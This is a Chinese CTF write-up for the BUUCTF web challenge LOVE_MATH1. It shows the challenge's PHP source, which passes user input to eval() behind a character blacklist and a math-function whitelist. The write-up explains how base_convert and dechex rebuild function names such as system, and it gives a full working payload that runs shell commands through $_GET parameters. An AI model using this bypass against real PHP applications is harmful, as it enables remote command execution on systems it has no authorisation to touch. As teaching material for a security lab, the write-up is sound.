BUUCTF WEB LOVE_MATH1

2023-12-06 09:36:58

这题考的是黑白名单绕过
进入场景,直接给出源码

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

只有whitelist里面的函数可以能够被调用,注意到base_convert(),dechex这两个函数,这两个函数是可以实现把数字字符串互转的
dechex是十进制转16进制的base_convert特殊版
小demo:

<?php
echo base_convert('phpinfo',36,10);
echo base_convert(55490343972,10,36);//十进制数转出来都是字母,所以必须是10进制
?>

基础进制要选10,16,32这种,不然可能会出错
举个例,?c=base_convert(55490343972,10,36)(),成功回显phpinfo页面,那么下面就只有一个点需要考虑了,就是长度不能超过80
姿势很多,只要掌握了原理,c参数长度不超过80,都能过,哦对了,还有黑名单过滤,单引号,双引号啥的都过滤了
尝试读取当前目录下存在那些文件
system(‘ls’)编码后?c=base_convert(1751504350,10,36)(base_convert(784,10,36)),当前目录下只有index.php
下面就是长度超了该怎么办了

说一个我觉得比较好的,把要执行的函数名当成get的参数,然后利用$_get{}的方式进行绕过,当然你可以通过getallheaders进行抓包,手动指定请求头
这两个方式本质是一样的,直接在url里面写吧
原始模式system(要执行的命令),指定$_GET{cos}替换system,函数名要用白名单里有的//绕过[]过滤
$_GET{exp}替换要执行的命令,当然命令也得是编码后不带单引号的
于是?c=$_GET{cos}($_GET{exp})由于_被过滤,_get也得找东西来替换,用$pi就好了
于是编码成了$pi=_get;$$pi{cos}($$pi{exp})
对_get进行编码base_convert(37907361743,10,36)(dechex(1598506324)) //base_convert函数对_不编码,因此需要通过hex2bin进行二次编码
由此得到完整的payload:c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){cos}($$pi{exp})&exp=ls&cos=system //$pi=_GET

参考视频连接:https://www.bilibili.com/video/BV1xL4y187pb?spm_id_from=333.999.0.0

上一篇:10分钟搭建私人网盘系统


下一篇:COS 音视频实践|播放多场景下的 COS 视频文件